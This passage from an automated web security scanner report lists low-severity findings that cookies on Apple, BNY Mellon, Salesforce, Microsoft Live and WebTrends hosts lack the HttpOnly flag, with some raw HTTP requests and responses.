ccl=W9d+P/weFqXFr6H8nSQrFNjrX108Oe5VqptvfEBzDpvj68l+vIceQs0teSQaTJ2djpwcgjtR7a+Mxj5YgWVADoEk5u0RQjgnZEVBo3iTA57e3UARWFfTplsk3U6C5f7uX6Mo4Nr1OLUNearzGAZ2qAVp1s55m45QcPHq6T7rhJ6m8lzGcTv9INR0f72zHNlk/M0vXA4TsCidLkg639JfMpJgNuNE1Z5UQj/JRfdFAVHq51xfp0n8+cAXYl7s+e4hNqrCWONWevzft2zI65Hcnnc4FcKlwNe+u5BCmi9Mj3anmM2oAHjs2GJPNPwhULU5DsUKSa6duqb+SxJ1ryW1aOPfPe+Po2zxh0fHYIMN3DPkf8uAtycmQGsMpDKG1MEf0h+bg3hhvqDeHqnMdlKdd2mnZM/fBUoAkdMK3MJkx4BysVjUzu5dFAyx3QsB+0GgSKBUc/IGUlBIyEW4OBiK6gPf85aoUMR9CLeU47799FK23u4kbVxYSYQIlMtN4LqZRfteAXVJLMdyEM5uT6fEByeDHgwtljUe44mrZNHWePZM4qeLDoVKQXnQI89j2bpl; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.64. http://images.apple.com/global/scripts/content_swap.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/content_swap.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=yset3HlqlXXedErdrhfwFqlK7fPqM3ABNKuAZC58cwdxh7SdMXx+EqpxTqphBovEWPqGrq17zqIGw0tCohwrnSxToTuKbnQnGgu3T9eIk+BT7aZVOK79Rpk7FQFNJ0OgNxj5/KTmw/1CDlXKxb88sPBWbL4TfCoMwRDqTEo273pvf+WKVsLRU9JkU0K9BDODHX+dvYrIR8iTFrcccwdGqkJV3euxF1RsybNzNGSiYrfcYKlfu8h2lY8LYmGHY2b20GywOs70THudYHDvIf6JziCzOJTf/F1be8SGBq14vEBmUGGd9t62bmSQUHh++p+1Phub0kwrIUTCr7+7szmbQVYAVMI0u0LFe3rtUmSKwoW2M1zS/2zk6/pzwCUd7+yBmf+0f88i26KxzaHE1c4uxN5cQf/s1/PFJU/Zii3Qp9OjxltvMY3MngUN4ZXYCdrqWeV7+msCzSToLtJPlDDoDgkaPUj4vNfMd3s3Td67C9yEXKxbLkDTalMdHl5EWpw0uW0OZOs3T2djrXkhCZ8xwwGUy8+tHLRzOFWbcgrq1UHNsiHE36xYCxJv/epLnHSY; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.65. http://images.apple.com/global/scripts/lib/event_mixins.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/lib/event_mixins.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=sBVN3TbalgB5E4m7E2xJmh0tmzDg2x54HfrzCe1cTPY/JCCdkEWUzjsmaMQ+M+20mvHYnyoNpkw/0GE+0PvYuDoDWuxsH+O1SX7ECNzZCPm+y3dS3i/+9OXsY1OnxfDzuDZK8QHdTyJFaUXXMMF6x5TlnphpmdnubPhpBm5ifixOdVBey0Iu322OO4vxLb4/mkNtVxBpebhlf1AFNnfUVoQGmzco212M5bUx68c5kVY/rO4FXA8Sw14poHM86i3S+0T8rkrHw68Nbi/R9JRHGuNDvreVVKff3A7A3CFjHzY9nTGS19mlXN0xoWF4grvxy+fG84px5BkF5ZsGz4ZGDc/6Ozi7MiWdA6dLP4DNSVxtKK1aV4tk5v/eHC1ThR4yBjGjQVwhBbsxdhErZ960BpYWHkPzQoLSnGp4/blKB5yhJAfvpDqw15ZTt7E4YUS0cA1nqyyl+NXX17fxrkuYu6tl01HkGv4cY0LoiO+iMYbjZVt7ZuOzSFuStNQSR67hb/fOAgJ5XkzMcyCaQi3Dq+ECqimj/QsOc4882PVjSLDy777hpnD72Tft8IAxZBU9; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.66. http://images.apple.com/global/scripts/lib/prototype.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/lib/prototype.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=hMyCmLF+YsroMeGIo0mEk3STgu7UYkNoKxupEtmb3LVs/Fn3urFJcVbv7h5V+5y0Go9jUjbAhCUQ9eExHixVAfNzygpZjF1oc3AG0bubbEVlPzjVH6Adnne50hBhYnVY9bZbpB+/BN5tt+aN7AazSN0+OMySApYdn0gDrEmFqaXR7CFdWG/FgcDPEEfAcovhD7EYb6D+nYw/aW1VIKmc53GWjLK9LHxCIQbpHoIHnqY4JJoKVL8itd8BSK42z4SOwOTXZhOcNVrntM/inbSztqwO0DVmWnKDMM/P4GrjUwbdmfh3d/7434snspLKsSy3FAHLQ3NH4kYba/1JwYTThA07i6rPYxcaOuoAQN7kfMei6SBfLUHAtIbkoMNi696fSbk/GqR7U3i6gC+iOamYT/NaUQFqPSKEtx4XAXdjAh8VvFS+dZ59yR/yoyMgrds8layxUG/JSESb1MvvrdU8UIEkn4FNus6vUMHl1vzz8f8SOTEo2OMAabczdG6gKhOiVOqFgVoGAqNLsFQdbzB4zy0FSnREg2NSPZkV0Mb6Z+vBtS+2Gzqbtw44WG/1OnJc; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.67. http://images.apple.com/global/scripts/lib/scriptaculous.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/lib/scriptaculous.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=b0z9opXdW37drfDfyMKib4xNpnFpP9m+gj5KUJnAOz3PjFPvhXjCszkAFvAFuV/gcgrqMXyNcPXYm95N2qr1UA5Beq2Qg2/fBWvUJxn/PLs4urDm8oDEz0V9Vjw9u9T0sAWm5dM9Ife+3gnHwmLNx6rmZhDdUjitHJzOfKSsbkWqjY5QiiryzykhI0Cp5hiplk03WNr93Gvm00fJ68CJQgx3oxnz+Tcvt8xxRGc4hPpQRIwvoS9YCmRCFkjFLu+iZCdBfosP+ezysYfkB0WF0SoYwu6lT6T47vNuyZJQQGZvjgTYbia5ACFHDi1emMISu8eEO9JKoafuPu+/EP1ozm5XmArYvYTWZLXVQEWyDrgGITPxRTOsRYja56nXmRVzIUtsVwx+nTB7DT0pKu5F2jmIGM5geNmpd+w1mH9vKeSqK/3clVku0EA2pTtjPkoTSs4aSWVNQZrG4sOb6yqgaxl4+cpYNXhZSxOr34gBYV2XHdvBlA0dpS5XLgy6HbDpNp/Ny5K9K3isKGHjCuQvDEyPsCXOrWLHmtJn79hNa1i5wEkPBAYbYOLjQmrlA+ga; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.68. http://images.apple.com/global/scripts/overlay_panel.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/overlay_panel.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=YTXNJI3FCQgB8dxsD7AqY057PByO/l2zbgH2wFRDrum3Ig6uCv0TBq2YpQf7se3WXtxZIAuMgq2gqgzWOIWTaNykftxf5IuPXpHcSkePmbVV+WxpHpMfEQ63QCxuF/gYS66T0bwSMAKw72SU24T0S3/O3qpnD/mmKl7Djfib8oqwY+QyAUn2FVU1LLelD8bHgt+60axQ6wI9FSa+KYIwnLpx4+xeWRCtXubNAG9x/mLbJ/s0EEyJeqrb2Q0pB6/wfaIXuCRTZZNxgx/LBjRvOtP8/oWh6RWWi1Td+4SJRN+LroThUN8oONNoPYNkLPBhxbcm7HKbIkaiccBRGdO8lUPZjKAbR0UdHCjCFYFNTD2+qZGMw3rQ9FN08c7dTDK/V1ppOWGYffKVJmx2tQJA6hS+SsKZ9tgXMThwD4teMLUnpzpJ6Ba6h+xt0pOR8ptOaucyf2mlsCzSuyu3DvQMHTKxLaaetcHng+vBxmvEmfV5kJzIxGA/XSsoHS8LcT3UEEK2nlhphXHvP3Zp69rkoEX3DHA9ArlKEwfvB/dCK4doNvsHYUK3nb20cjYge1zw; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.69. http://images.apple.com/global/scripts/search_decorator.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/search_decorator.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=LEJBEBcQgxjRsTTCyAyYKhmrQ29mZ0tWZB2LLEvwBvmGhUolex0IKN0tkOfWn0IRDQecZ7oWhs+BcY4jVyGVZNnMltnMRgtSDqGLLt0A4dQCM2dk3XSM93IAotSYgDtChyr6vB5EnIx9I8BGt1w+NV02BAMXRHFAU5KKQ4pDq9PYwMmpFhrmYVnkmPEB2wSd7jOCQIIo8SG+3fCB93TKfTnFPl9XC3aBtShw+7JTPold2YkZobB1eP4vaaNyiXG4r+vGIDmVsy3H0bmCQBzD3QOMbB69nwIgfE4xTPT3Muku37mGY1aulIO/b39sugY/NrWIYfVq+MAcTRJri8mruMiZnOozdqngIcCl/rtx2fq/XcoYRslIgp8Oalavojqcq18SDeyDaBRoC8ECx0aoKp9VOnMeqA2aWHzunbVZ/SUNoqg02qeRYmaNIbv/S56XrUylAt3mdz56r9MHZeDu/qMb98o3CXzRVtubBHxcbZ33NfYY2HWiZqpqNM2T45275YqvYQu325MjTG59ZL2p346RvTxqFT3xE0jLl2080M5vX04ea4TN8q2cR1qNhiJR; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.70. http://images.apple.com/global/scripts/swap_view.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/swap_view.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=DgFhV0K9vbrLvIKQ/ohaOrDgNrbgYzv038niR20mFJ1TeNIhlRS9Akj+VtmF8/YQWH6+TNwMCIJ/xwlSCj/VZ1QqQKKs+9YCHrWJbbBxrMcbKZzNJ/6jo0ef9WBeJMnKqyGXCTM6W6zU3KzNsKGRem5F2gKN8NiYS0vlDCU9abaven2AVH4YHwSKZoN5M5nOz/bvqYPvJoLLAI5KMFCwoFqjO92pnNnaIVTmO+nRpkl9Xy7SRXKDz9LDw58cFhuIMCrfK3GMHYIxv/NVeZZVIp+cdFy0jBUg25LC58XbP7o3ZpULlNf/iTECsydJmsrkK8DRdnjNm797Ts5WfBSHzvqYysZ1ZSU0a77CxWOTy64eM9Nwh714ihKnzZQi/Bp0B+7uUCcfswE3pgUVYGBSSrSE+QqssPiwzB2j51Q7637zezmWRBhG4gQ1z+7+AzsneClCGUjhtzwzW9clgcVnAUXCKluCDdrjw0eHDKx/fJNE65vLnnXUju0pk98x8W6EeXy/Lb42sLCsZAyYODkBTD1j33V98NyncjXmtB6rQnQWxLPfoSpKcTY+knm4sbyP; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.71. http://images.apple.com/global/scripts/view_master_tracker.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/view_master_tracker.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=xLxcwxCeTU+HYfHdmg/XQ8YHOoiJO9noVqYg78e8+UwdNUwRLNGUneo/H/zqR6hX6hwuFlGm33hlyD+iHOcu2Nz05YIPyfnvB7M7c+5fPVLYhQdWWcR9Vx9fVRfrc5gt7rzuGzLi8pq+ksSNXMMYXeztRsf5amVS0qX/jE9IqXzFeyUzRF5QNcIFGUpQYa4c8+MMVeVWYo4wLZP+6fr4/mKawRV5fhRfA16jKNYam9mElYTBhrtroIu+IP9hM2zUmpjHPFZwQv7j/hs+F+B8paUkojp3Qle7GfRR8YNkZJ3MoYnxIb5yJLXQn9EZxYG6PB3v5k55MOj3vyPQeMWEr2EYhIgHSgTFSxSKp30GRFQYQ1Xal8nUiCv/kLGbCEz6Rmh4rTkVYAUvVmFc0l4fiUEWPgByZjpkVvevgCKRSi3mA+v14EJ6g8fw5nxnUsEaivwDP0a5V/StziMyyqofL7v4N+VFH/VfQasfZ04ORMFy40xFvWNSDWmObK+KZOFDgy4tcRNpIlxvdwe0F4BBHaa/wNVIDWdQKtGjCEeFPQuE7i5E2HlkgivW1oGtcdWT; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.72. http://images.apple.com/macpro/scripts/pagenav.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/macpro/scripts/pagenav.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=ZHzTaP/phyT7ZztWPfF5YV5rnLeKreE+BudU5VhJnvfzQE8c76KGu5bYP2Jzb5XcPvR/RMzLRmQ5vbPj28VAYRnqDE3wGY9bhnVVrx+x7BRNhOYCye0Q/zuhgPrHaJxpN93Aehy4J54iy2k6AGj85umsg42TuAZ8IM0dASMUW6L3nymXapXlPmi9fO7CsBm3tuoQFaO5QxnFQ8v7rYtrI2X0RWi2L7JSVaEEcf17F98FUrdpo35pmpAJNA9vNteKaT+fqJpnmhwsPxwRjmJW+9fx5oU6d2BipKOTqedPxNZ1yM5XchWp/bDANVriSqcdjdMmn4cZ5KfY0n/7UUQ3yHsNBxEAudwcCY0zkX1yl+F56vNE78bLS/l6ffsqlEADXYVG4dYfvWaYqT90FPcrQbIaZVZTG+nrj6rnAcxbkyzIy0RGpslI7/qF77mmUd8g6aQ/dqf60BZbFAJrQwTahUZDJcf7IFyI5SiDn8Y/MGBKwK2Tksrb1kC073U8KfGOsjUQtAP7mPjp/L+NoCYoC4MLbDi+AE7LaFApk3Z8zu6U7az+j+Bdv62J564xGR99; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.73. http://images.apple.com/macpro/scripts/performance.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/macpro/scripts/performance.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=huWud6MKM7fGr0sLtRFuzkknrgsqAUkTp5IgBXkjCJaXl1aBa2/a1BTGEGc6O2eGT1eLV6q4Dy5MBqDybpe/t+hzl8OwCOE533KhHnYrArt9HgSVUjzpYV8BY2XC/2FgpB5CiaviiqCklljw6gCQppgmf301SbQsao3jTu8JT28V5D++bg4X/u7IqczRA+pCv/AEKmcJV9srYhH/qlNZ7tBqNPtTMu1U4xT08moPm4Y4Ch/OYdqCwrk81oJzey2qnZdg6xTi8vobg+YNRJX9aNVT3l/iQfBmQR8nrLQCxIfls1E30U4qkqvqndWd6WsgqCEpREkk+78aS/kgGNXYWlKuHD/1zX7CxFAIQSOcb9AQDJV4rZoYSi8v3O2dsqVYzRKsE8Ai4wLbk8hpZV+dbBtMzaSUTxBSc2yw69wZ2Ipmon6WGQhryD0tKpL7OtTNgqYdcbQ3laI4KTk4JXZ9o38DMubgklNazzhfx8w2ERFgv9vPYx2+BrY5ltemg5F8DAZcU43GXtzMHdW+dsyRXnabk9Lu6RdwhM+HaUARBVzZ9te0DlM9fMQ6i8/OIGSj; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.74. http://internetdc.bnymellon.com/dcscqt3z310000c9vrxqgfz0d_7c2w/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://internetdc.bnymellon.com
Path:	/dcscqt3z310000c9vrxqgfz0d_7c2w/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xODQxNDQwMTkyLjMwMTY0NTIzAAAAAAABAAAABQAAAIKnJU6CpyVOAQAAAAEAAACCpyVOgqclTgAAAAA-; path=/; expires=Fri, 16-Jul-2021 15:49:22 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcscqt3z310000c9vrxqgfz0d_7c2w/dcs.gif?&dcsdat=1311090569906&dcssip=www.bnymellon.com&dcsuri=/index.html&WT.tz=-5&WT.bh=10&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=BNY%20Mellon%20|%20Asset%20Management%20and%20Securities%20Servicing&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1065x723&WT.fv=10.3&WT.slv=Not%20enabled&WT.tv=9.3.0&WT.dl=0&WT.ssl=0&WT.es=www.bnymellon.com/&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vtvs=1311090569909&WT.vtid=173.193.214.243-1841440192.30164523&WT.co_f=173.193.214.243-1841440192.30164523 HTTP/1.1
Host: internetdc.bnymellon.com
Proxy-Connection: keep-alive
Referer: http://www.bnymellon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-1841440192.30164523:lv=1311090569909:ss=1311090569909

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 17:00:42 GMT
Accept-Ranges: bytes
ETag: "0599d23da60c71:37a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xODQxNDQwMTkyLjMwMTY0NTIzAAAAAAABAAAABQAAAIKnJU6CpyVOAQAAAAEAAACCpyVOgqclTgAAAAA-; path=/; expires=Fri, 16-Jul-2021 15:49:22 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 19 Jul 2011 15:49:22 GMT
Connection: close

GIF89a.............!.......,...........D..;

14.75. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

udm_0=MLv3NC8JZjpr3hepMJpsGd7ZVglywUUUvJuj5VZ2CE0t8dfV5LwaUQjNwVbd1KDsr77b16gERAB5waljbHAN6H98Pl0AhsBm+/8/n4kBAKNvbGggCQBQCKFjwO/4vNXlthu+mZudlKzcvg2eD0PWpTrOGzZmDhy+kT1EmcwBoAO0IKtoEgPyuRXsrKhjAPdfOqp1WY2DrEwqBJauu/w5tyh+BT9TzPYbaJrEufdJZOhzK/ze/4INKhyYkuK043aby26fhjo1fRPvQfg8Vv9ky31mCuwE2rn7zHOg9uUTIR9/pT+2Q1cNcL2sBgO2QKXWJUHA0GoPCnCuTu4FXIceSN86XOvYLtaDGb/VE3/cWEa5h+xLU/n1eRAWVNpONAcc8IVRrB3yeJ+KZN3OVRWFiTolD4d3Q8UaXRlyCCjx/p+9x7pkknB2pF7nnL/SmYr2Lwjns5uaNn1lO0BlYt1u9k1UDPZSahS4NFOuD3X7Z5sqpUTrt4mKNQSJi4y9vt051ZS0wALkL1C0RPG1PmP3SYnWNvGCkLyo687UCx7dnLLq3YM2Jf98NxWkSunKBwuza1h43Y+vH2Bpt/cCUySR+dYMe9BO5npHhLxmC5mqL9dUOwlx16FRiJl2J98XY1lkRTF3T4F3eP+K3/BSXRJVMGHbX5U7MkXwp2xFhrmN4IvwhCjXOUYPuMOXAkZdv1pAEzw/DPAosnP9wPXrDue1sA1RI0N90Ohj/cQIHkT9B2IKlnJUzb+ZwBq7LMhDN0uh2H+F2T/IPQM8Kb8cPmV36Ob6LJGyvSJW7JlTQPJbnJrHWuYc/f8oc1hOALQN1Uh3yf7Ttj9AjZg8L2p/XRPHZooO2apNxEVKh9IITo1syr0JzfL9xVF/mdaXIcTytwEWVcX8z+P+GimfPZDdpXVtm6bNTVaRwiAtECRbgIwqHinNlb6kYt5dvK5n3gpnddFIIx6JUu99J8AmRXTwOmFiplx4GT5tbsXq6MRCZ6YoegbYXQtj9uuSZY/aVe8bIoKBgB40J2xpeACsFVdmudeB9yPdJbGhAuE2tc6hB8iQ0tKRVP0DfEAn5r/MnT5QbieDGHG2/yzv1qvm6NtoCZnilGVcciWqVvbwutNO4pGGWhC8E+oCe3Iqgcr4x+AP0bWSXCBf68XSjr3AyN62bAor0Dk1J9FAbXW9n7wvgQGxi6YrNuupRHSk3JnEjRwwFfq6wHwnF94B9We6QFXJY1ME6z6t2mKyVJBEcuuoLF2cnfBLokoHsm9TyeNXvGUQ6wdYC1AjzJVIFdFPsWKKK5OidfKjVBnGRyasdUPinEXieAmNfxMPANj+005urzTjHzAqPGSxIS31eC04uTJ+TSVEF5ww9PPNQHdBDjcbIwwuREREsUZDTmZiikJKGA6HzdIjgDSIrEzNpjwxQJvJ71PMSxdc0m+0PApKF46AMpju8YcoicKsjnMDKIuSbXRYc14=; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:25 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.76. http://lct.salesforce.com/sfga.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lct.salesforce.com
Path:	/sfga.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerlct-pool=87351818.38687.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sfga.js HTTP/1.1
Host: lct.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx?_kk=defect%20tracking%20software&_kt=482c9585-bb4d-4f18-a618-06cac501c541&gclid=CMLoqZDNjaoCFYaD5QodbQ3F0w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/javascript
Date: Tue, 19 Jul 2011 14:20:43 GMT
Set-Cookie: BIGipServerlct-pool=87351818.38687.0000; path=/
Content-Length: 9247

var _kd = document;
var _kdlh = _kd.location.href;
var _ki,_kq,_kv;
var _kwtlForm;
var _kretURL;
var _kwtlOnSubmit;
var _koid;

function __krand() {
return Math.round(Math.random() * 256).toString
...[SNIP]...

14.77. https://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/login.srf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MSPRequ=lt=1311089882&co=1&id=273572; path=/;version=1
MSPOK=$uuid-240ff659-d409-4377-897e-e75ad2d199e3$uuid-1895cee1-27dd-48d7-8aac-abac4dc44583$uuid-893a9771-4ec1-49d2-b1d0-11979f88bfa5; domain=login.live.com;path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.78. http://m.webtrends.com/dcsk730ac00000w4taqdiehjf_4b7y/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.webtrends.com
Path:	/dcsk730ac00000w4taqdiehjf_4b7y/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAARAAAACgAAAGuQJE5khyROfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAOtv2E3rb9hNdQAAAFajJU56oCVOoAEAAGwVJk5sFSZOKwIAALSNJE6fjCROZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAFmNF04xjBdOCQAAABMAAABrkCROZIckTmYAAAB/O+lNfzvpTRUAAADbjiROxI4kTkQAAABWoyVOeqAlTpQAAABsFSZObBUmTi0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTgAAAAA-; path=/; expires=Fri, 16-Jul-2021 23:38:20 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsk730ac00000w4taqdiehjf_4b7y/dcs.gif?&dcsdat=1311118707061&dcssip=www.bing.com&dcsuri=/community/site_blogs/b/travel/default.aspx&dcsqry=%3FFORM=TRGRMR&WT.tz=-5&WT.bh=18&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Bing%2520Travel%2520blog%2520-%2520Site%2520Blogs%2520-%2520Bing%2520Community&WT.js=Yes&WT.jv=1.5&WT.bs=1065x723&WT.fi=Yes&WT.fv=10.3&WT.sli=Not%20Installed&WT.slv=Version%20Unavailable&WT.em=uri&WT.le=ISO-8859-1&WT.dl=0&WT.seg_1=Unregistered&WT.cg_n=Blog-Travel%20blog&WT.wtsv=1&WT.co_f=173.193.214.243-3661456592.30151123&WT.vt_f_tlh=1307061370&WT.vt_f_tlv=1307061019&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_sid=173.193.214.243-3661456592.30151123.1311118707064&wtDrillDir=/community/;/community/site_blogs/;/community/site_blogs/b/;/community/site_blogs/b/travel/&wtEvtSrc=www.bing.com/community/site_blogs/b/travel/default.aspx HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/community/site_blogs/b/travel/default.aspx?FORM=TRGRMR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAARAAAACgAAAGuQJE5khyROfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAOtv2E3rb9hNdQAAAFajJU56oCVOoAEAAHks6E0aK+hNKwIAALSNJE6fjCROZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAFmNF04xjBdOCQAAABMAAABrkCROZIckTmYAAAB/O+lNfzvpTRUAAADbjiROxI4kTkQAAABWoyVOeqAlTpQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 Jul 2011 23:38:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAARAAAACgAAAGuQJE5khyROfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAOtv2E3rb9hNdQAAAFajJU56oCVOoAEAAGwVJk5sFSZOKwIAALSNJE6fjCROZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAFmNF04xjBdOCQAAABMAAABrkCROZIckTmYAAAB/O+lNfzvpTRUAAADbjiROxI4kTkQAAABWoyVOeqAlTpQAAABsFSZObBUmTi0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTgAAAAA-; path=/; expires=Fri, 16-Jul-2021 23:38:20 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

14.79. http://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.webtrends.com
Path:	/dcsxia05c00000s926v0z4tru_3w4l/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

